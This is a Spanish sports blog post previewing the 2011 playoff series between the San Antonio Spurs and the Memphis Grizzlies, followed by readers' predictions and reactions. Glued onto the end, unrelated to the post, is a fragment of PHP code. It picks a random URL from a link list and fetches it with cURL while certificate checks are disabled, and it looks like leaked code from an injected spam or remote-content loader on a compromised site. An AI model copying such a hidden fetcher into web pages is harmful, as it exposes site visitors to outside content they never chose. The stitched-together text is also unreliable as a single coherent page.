Análisis San Antonio Spurs vs Memphis Grizzlies

15 de April de 2011 por TheDeerHunter

Regular: 2-2

Spurs: 103.7 PF – 98 PC (+5.7)
Grizzlies: 99.9 PF – 97.6 PC (+2.3)

En la corta vida de la franquicia de Memphis este enfrentamiento ha cobrado una cierta relevancia para ellos. Ubicados ambos en la Southwest, se ha generado un cierto histórico de partidos los últimos años. Los Grizzlies han sido capaces de dar la campanada en varios partidos de la regular, aunque no lo consiguieron ni una vez en 2004, en una de las tres ocasiones en que Pau les llevó hasta la postemporada, en el zénit de la época dorada de la dinastía Popovich. Ahora serán otros los que deben intentar estrenar su casillero de victorias en este contexto. ¿Está Marc llamado a romper la maldición de los Gasol en playoffs con Memphis? Que no os extrañe que lo logre.

Los Spurs, para lo bueno y para lo malo, ya no son aquel equipo espartano que dejó a Pau seco hace algunos años. La mutación ofensiva ha sorprendido a propios y a extraños, logrando con un estilo diferente un excelente balance por el que muy pocos hubieran apostado a principio de curso. ¿Quién nos hubiera dicho que íbamos a ver unos Spurs anotando más puntos que los Warriors? Ahora bien, llegan playoffs y es complicado mantener un ritmo así. En cualquier caso hay muy pocos que puedan ajustar sus equipos a las circunstancias como lo hace Popovich.

Es un 1º vs 8º, con todo lo que eso conlleva. Sin embargo, existe mucha menor distancia entre ellos de lo que refleja el abismo de posiciones en la clasificación. La defensa de los Grizzlies, por ejemplo, es algo superior sobre el papel, y similar en los rebotes. Los porcentajes de tiro son prácticamente calcados. Con los antecedentes de la regular no se aprecia tan claro el favoritismo de los Spurs. Eso, por supuesto, obviando el “corazón del campeón” y la experiencia que tiene la vieja guardia. Éste es su hábitat.

Claves de la eliminatoria:

– Las ausencias: Es una lástima que Rudy Gay no sea de la partida, aunque cuidado, porque no notaron su ausencia en las dos victorias que lograron en la regular. Más decisiva sería la baja de Ginobili si su hiperextensión en el codo derecho le impidiera, aunque sea, estar al 100%. Por mucha grata sorpresa que haya significado Gary Neal, el argentino es insustituible.

– La experiencia: A estas alturas no les vamos a explicar a los Spurs cómo hay que afrontar una eliminatoria de playoffs. Algunos de los ositos ya cataron alguna antes de llegar aquí, pero no muchos. Marc, Conley, Mayo, Arthur… ¿demasiado pollos?

– Choque de trenes: Zach Randolph más Marc Gasol más Darrell Arthur es un juego interior tremendo. De lo mejorcito de la liga. Tocará sacar a relucir todos los galones del mejor ala-pívot de la historia para ganar ese duelo. Cuidado con el factor Bonner, aunque éste no es que haya estado especialmente acertado contra los Grizzlies previamente.

– Defensa sobre el balón: El factor desequilibrante a favor de Spurs en la regular han sido Parker y George Hill. Es imperativo que Hollins encuentre la manera de tapar ese agujero. Conley no es un base defensivo y sus interiores no son nada intimidantes.

Pronóstico: 4-3 Spurs.

Comenta

9 comentarios a esta entrada

  1. Txusma dice:
    #1

    Esta eliminatoria sí que se prevee durísima. No sé si los Grizzlies conseguirán ganar 3 partidos pero me da que todos los encuentros serán disputadísimos. Ojito al factor Tony Allen que está a un nivel impresionante tanto en ataque como en defensa.

      Citar

  2. Kiki dice:
    #2

    ¿Alguien sabe algo de la huelga de D+?
    Parece que por ahora acababa hoy… Como no den el principio de los playoffs estamos apañados…

      Citar

  3. CAMPO2 dice:
    #3

    Esta eliminatoria es una de las que tengo ganas de ver

      Citar

  4. GreenPride dice:
    #4

    Eliminatoria muy interesante. ¿Son los Spurs el mejor equipo del Oeste? En la regular lo han sido de largo, al menos los más regulares pero los playoffs son otra cosa. Creo que los Spurs no tienen equipo para poder ganar la NBA a pesar de su gran liga regular pero si Manudonna está libre de lesiones así como Parker y Duncan todavía pueden asustar a cualquiera en una serie a 7. Los Grizzlies han hecho gran final de curso, con una defensa muy presionante en las líneas de pase y un gran juego interior. Creo que esa será la clave. Si Mark y Zach se imponen bajo los aros los Grizzlies creo que incluso podrían aspirar a la sorpresa aunque para mí caeran con honor en 6 partidos.

      Citar

  5. Javijaen dice:
    #5

    Un 4-2 para San Antonio lo veo más que bien, quizá seamos hasta optimistas, no sé si a Memphis le dará el canguelo… Espero que no!!!

      Citar

  6. Jabho dice:
    #6

    Yo lo veo mucho más fácil para los Spurs, 4-1, al menos si Manu está bien.

      Citar

  7. German dice:
    #7

    4-1 Spurs. Aunque con partidos bastante cerrados

      Citar

  8. Denise dice:
    #8

    Y primera victoria para los Grizzlies en playoffs en toda su historia, 101-98 a los Spurs, con 25 puntos de Randolph, 24 de Marc y triple ganador de Battier.
    Nunca pensé que Zach iba a tomarse tan en serio su etapa en Memphis.

      Citar

  9. Scriers dice:
    #9

    Y hay que alegrarse por Battier que se ha comido mucha mierda en Memphis, ahora vuelve y cuando parece que jugaría poco… pam! por cierto que el partido casi se les va a los grizzlies con 2 triples de Bonner solísimo en el perímetro. Y entre tony allen y marc casi tiran un partidazo por los tiros libres. Pero apareció Battier y los Memphis hicieron historia.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>